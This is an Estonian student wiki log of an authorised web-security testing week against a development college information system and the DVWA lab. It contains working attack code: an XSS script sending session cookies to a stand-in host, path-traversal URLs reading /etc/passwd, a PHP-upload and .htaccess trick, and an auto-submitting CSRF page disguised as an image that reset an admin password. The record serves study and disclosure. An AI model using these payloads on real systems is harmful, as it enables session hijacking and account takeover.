Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T20:49:09Z

Ulihten: /* Nessuse algkäivitamine */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

==Väike upload tegevus, mis võiks olla teisiti==
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
